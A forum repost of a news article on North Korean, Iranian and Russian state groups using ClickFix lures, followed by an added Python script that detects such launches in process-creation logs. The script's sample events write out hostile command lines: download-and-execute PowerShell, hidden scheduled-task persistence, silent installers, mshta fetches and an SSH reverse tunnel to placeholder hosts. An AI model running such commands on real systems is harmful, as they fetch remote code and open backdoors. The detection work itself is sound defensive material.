Carder.life
State-sponsored hackers embrace ClickFix social engineering tactic (http://txgate.io:443/showthread.php?t=51296642)

WWW 05-26-2025 12:00 PM

<div id="post_message_787078">

ClickFix attacks are gaining traction among threat actors, with multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia adopting the technique in recent espionage campaigns.<br/>
<br/>
ClickFix is a social engineering tactic where malicious websites impersonate legitimate software or document-sharing platforms. Targets are lured via phishing or malvertising and shown fake error messages that claim a document or download failed.<br/>
<br/>
Victims are then prompted to click a "Fix" button, which instructs them to run a PowerShell or command-line script, leading to the execution of malware on their devices.<br/>
<br/>
Microsoft's Threat Intelligence team reported last February that the North Korean state actor 'Kimsuky' was also using it as part of a fake "device registration" web page.<br/>
<br/>
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/u/1220909/2025/February/admin-exec.jpeg"/><br/>
<div style="margin:20px; margin-top:5px; ">
<!-- <div class="smallfont" style="margin-bottom:2px">Quote:</div> -->
<table border="0" cellpadding="6" cellspacing="0" width="100%">
<tr>
<td class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;">

ClickFix page for fake device registration

</td>
</tr>
</table>
</div>A <a href="https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix" target="_blank">new report from Proofpoint</a> reveals that, between late 2024 and early 2025, Kimsuky (North Korea), MuddyWater (Iran), and also APT28 and UNK_RemoteRogue (Russia) have all used ClickFix in their targeted espionage operations.<br/>
<br/>
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/u/1220909/2025/April/timeline.jpg"/><br/>
<div style="margin:20px; margin-top:5px; ">
<!-- <div class="smallfont" style="margin-bottom:2px">Quote:</div> -->
<table border="0" cellpadding="6" cellspacing="0" width="100%">
<tr>
<td class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;">

Timeline of ClickFix attacks

</td>
</tr>
</table>
</div><b><font size="4"><font color="White">ClickFix enabling intelligence operations</font></font></b><br/>
<br/>
Starting with Kimsuky, the attacks were observed between January and February 2025, targeting think tanks focused on North Korea-related policy.<br/>
<br/>
The DPRK hackers used spoofed Korean, Japanese, or English emails to appear as if the sender was a Japanese diplomat to initiate contact with the target.<br/>
<br/>
After establishing trust, the attackers sent a malicious PDF file linking to a fake secure drive that prompted the target to "register" by manually copying a PowerShell command into their terminal.<br/>
<br/>
Doing so fetched a second script that set up scheduled tasks for persistence and downloaded QuasarRAT while displaying a decoy PDF to the victim for diversion.<br/>
<br/>
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/u/1220909/2025/April/quasar.jpg"/><br/>
<div style="margin:20px; margin-top:5px; ">
<!-- <div class="smallfont" style="margin-bottom:2px">Quote:</div> -->
<table border="0" cellpadding="6" cellspacing="0" width="100%">
<tr>
<td class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;">

Kimsuky attack flow

</td>
</tr>
</table>
</div>The MuddyWater attacks took place in mid-November 2024, targeting 39 organizations in the Middle East with emails disguised as Microsoft security alerts.<br/>
<br/>
Recipients were informed that they needed to apply a critical security update by running PowerShell as admin on their computers. This resulted in self-infections with 'Level,' a remote monitoring and management (RMM) tool that can facilitate espionage operations.<br/>
<br/>
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/u/1220909/2025/April/muddywater.jpg"/><br/>
<div style="margin:20px; margin-top:5px; ">
<!-- <div class="smallfont" style="margin-bottom:2px">Quote:</div> -->
<table border="0" cellpadding="6" cellspacing="0" width="100%">
<tr>
<td class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;">

The MuddyWater phish

</td>
</tr>
</table>
</div>The third case concerns the Russian threat group UNK_RemoteRogue, which targeted two organizations closely related to a major arms manufacturer in December 2024.<br/>
<br/>
The malicious emails sent from compromised Zimbra servers spoofed Microsoft Office. Clicking on the embedded link took targets to a fake Microsoft Word page with instructions in Russian and a YouTube video tutorial.<br/>
<br/>
Running the code executed JavaScript that launched PowerShell to connect to a server running the Empire command and control (C2) framework.<br/>
<br/>
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/u/1220909/2025/April/document.jpg"/><br/>
<div style="margin:20px; margin-top:5px; ">
<!-- <div class="smallfont" style="margin-bottom:2px">Quote:</div> -->
<table border="0" cellpadding="6" cellspacing="0" width="100%">
<tr>
<td class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;">

Landing page spoofing a Word document

</td>
</tr>
</table>
</div>Proofpoint reports that APT28, a GRU unit, also used ClickFix as early as October 2024, using phishing emails mimicking a Google Spreadsheet, a reCAPTCHA step, and PowerShell execution instructions conveyed via a pop-up.<br/>
<br/>
Victims running those commands unknowingly set up an SSH tunnel and launched Metasploit, providing attackers with backdoor access to their systems.<br/>
<br/>
ClickFix remains an effective method, as its adoption across multiple state-backed groups shows, because most users do not recognize that being asked to paste and run an unsolicited command is itself the attack.<br/>
<br/>
As a general rule, users should never execute commands they don't understand or copy from online sources, especially with administrator privileges.<br/>
<br/>
<a href="https://www.bleepingcomputer.com/news/security/state-sponsored-hackers-embrace-clickfix-social-engineering-tactic/" target="_blank">@ BleepingComputer </a>
</div>
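The four campaigns above share one observable chain: a lure convinces the user to paste a command into the Run box or a terminal, explorer.exe spawns a shell or script host, and that process fetches a second stage (a QuasarRAT loader with scheduled-task persistence, an RMM installer run as admin, an mshta page that launches hidden PowerShell, an SSH tunnel plus Metasploit). The following detection logic is an added example written for this page, not code from Proofpoint, Microsoft or BleepingComputer. It scores parsed process-creation events (the fields of a Sysmon Event ID 1 or Windows 4688 record) and lets children of a flagged process inherit suspicion, so weak follow-on steps surface next to the launch that caused them. The pattern list, weights, threshold and the constructed sample events are this example's own assumptions, modelled on the campaign descriptions rather than on real telemetry; the hostnames and the 192.0.2.10 address are placeholders.

```python
"""Triage process-creation telemetry for ClickFix-style launches.

Added example, not vendor code. Input: dicts carrying the fields of a parsed
Sysmon Event ID 1 / Windows 4688 record. SAMPLE_EVENTS below are constructed
to mirror the campaigns in the post; they are not real telemetry.
"""
import re
from dataclasses import dataclass

# The user pastes the lure's command into the Win+R Run box or a terminal opened
# from the desktop, so the first hop is explorer.exe -> shell. (Assumption: this
# example treats explorer.exe as the only interactive parent worth counting.)
INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"} | SCRIPT_HOSTS


def _p(pattern, tag, weight, flags=re.IGNORECASE):
    return re.compile(pattern, flags), tag, weight


# Command-line traits of the second-stage fetch. Weights are this example's own.
CRADLE_PATTERNS = [
    _p(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl|wget)\b", "download", 2),
    _p(r"\b(iex|invoke-expression)\b", "invoke", 2),
    _p(r"\bmshta(\.exe)?\b.*\bhttps?://", "mshta-url", 3),
    _p(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", "encoded", 2),
    _p(r"-w(indowstyle)?\s+h(idden)?\b", "hidden", 1),
    _p(r"-nop(rofile)?\b", "noprofile", 1),
    _p(r"\bmsiexec(\.exe)?\b.*/q[nb]?\b", "silent-install", 1),
    _p(r"\bschtasks(\.exe)?\b.*/create\b", "schtasks", 2),
    # ssh -R opens a reverse tunnel; -R is case-sensitive, so no IGNORECASE here.
    _p(r"\bssh(\.exe)?\b.*\s-R\s+\d+", "ssh-reverse-tunnel", 5, flags=0),
]


@dataclass
class Finding:
    record: str
    score: int
    reasons: list


def score_event(ev):
    """Score one event on its own, without lineage context."""
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    cmd = ev.get("CommandLine", "")
    score, reasons = 0, []
    if image in SHELLS and parent in INTERACTIVE_PARENTS:
        score += 2
        reasons.append("shell started from explorer.exe (Run box / desktop)")
    elif image in SHELLS and parent in SCRIPT_HOSTS:
        score += 2
        reasons.append(f"{parent} spawned {image}")
    for rx, tag, weight in CRADLE_PATTERNS:
        if rx.search(cmd):
            score += weight
            reasons.append(tag)
    # "Run PowerShell as administrator" is part of several lures, but elevation
    # only counts once something else looks off, or every admin shell alerts.
    if ev.get("IntegrityLevel", "").lower() == "high" and score > 0:
        score += 1
        reasons.append("elevated")
    return score, reasons


def triage(events, threshold=5):
    """Pass 1 scores each event alone; pass 2 gives direct children of a
    flagged process +3 so persistence and second shells surface with it."""
    scored = {ev["ProcessGuid"]: [ev, *score_event(ev)] for ev in events}
    flagged = {g for g, (_, s, _) in scored.items() if s >= threshold}
    for entry in scored.values():
        ev, score, reasons = entry
        if ev.get("ParentProcessGuid") in flagged:
            entry[1] = score + 3
            entry[2] = reasons + ["child of flagged process"]
    findings = [Finding(ev["Record"], s, r) for ev, s, r in scored.values() if s >= threshold]
    return sorted(findings, key=lambda f: f.score, reverse=True)


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [  # constructed; "g0" is an unlisted parent
    {"Record": "benign-open-powershell", "ProcessGuid": "g1", "ParentProcessGuid": "g0",
     "ParentImage": EXPLORER, "Image": PS, "CommandLine": f'"{PS}"', "IntegrityLevel": "Medium"},
    {"Record": "benign-ping", "ProcessGuid": "g2", "ParentProcessGuid": "g0",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\ping.exe",
     "CommandLine": "ping.exe -n 2 10.0.0.1", "IntegrityLevel": "Medium"},
    {"Record": "benign-admin-shell", "ProcessGuid": "g3", "ParentProcessGuid": "g0",
     "ParentImage": EXPLORER, "Image": PS,
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service", "IntegrityLevel": "High"},
    {"Record": "kimsuky-like-run-box", "ProcessGuid": "g4", "ParentProcessGuid": "g0",
     "ParentImage": EXPLORER, "Image": PS, "IntegrityLevel": "Medium",
     "CommandLine": 'powershell -w hidden -c "iwr http://secure-drive.example/register.ps1 -UseBasicParsing | iex"'},
    {"Record": "kimsuky-like-persistence", "ProcessGuid": "g5", "ParentProcessGuid": "g4",
     "ParentImage": PS, "Image": r"C:\Windows\System32\schtasks.exe", "IntegrityLevel": "Medium",
     "CommandLine": r'schtasks.exe /create /sc minute /mo 30 /tn DriveSync /tr "powershell -w hidden -f C:\Users\Public\sync.ps1"'},
    {"Record": "muddywater-like-admin-update", "ProcessGuid": "g6", "ParentProcessGuid": "g0",
     "ParentImage": EXPLORER, "Image": PS, "IntegrityLevel": "High",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Invoke-WebRequest https://ms-security-update.example/update.msi -OutFile C:\Users\Public\update.msi; Start-Process msiexec -ArgumentList /i,C:\Users\Public\update.msi,/qn"},
    {"Record": "remoterogue-like-mshta", "ProcessGuid": "g7", "ParentProcessGuid": "g0",
     "ParentImage": EXPLORER, "Image": r"C:\Windows\System32\mshta.exe", "IntegrityLevel": "Medium",
     "CommandLine": "mshta https://docs-viewer.example/document.hta"},
    {"Record": "remoterogue-like-child-shell", "ProcessGuid": "g8", "ParentProcessGuid": "g7",
     "ParentImage": r"C:\Windows\System32\mshta.exe", "Image": PS, "IntegrityLevel": "Medium",
     "CommandLine": "powershell.exe -nop -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQA="},  # placeholder base64
    {"Record": "apt28-like-reverse-tunnel", "ProcessGuid": "g9", "ParentProcessGuid": "g0",
     "ParentImage": PS, "Image": r"C:\Windows\System32\OpenSSH\ssh.exe", "IntegrityLevel": "Medium",
     "CommandLine": r'"C:\Windows\System32\OpenSSH\ssh.exe" -N -o StrictHostKeyChecking=no -R 4444:127.0.0.1:4444 tunnel@192.0.2.10'},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.score:>2}  {f.record:<32} {', '.join(f.reasons)}")
```

Two design points matter more than the regexes. First, a shell spawned from explorer.exe is on its own just a user opening PowerShell, and an elevated shell with `-NoProfile` is routine administration, so both stay under the threshold; the lure only becomes visible when the download-and-execute traits of the pasted command are present as well. Second, the steps that follow the launch (the scheduled task Kimsuky used for persistence, the hidden PowerShell spawned by the spoofed Word page) are individually weak signals, which is why the second pass keys on `ParentProcessGuid` rather than on the command line alone.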



Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2025, vBulletin Solutions, Inc.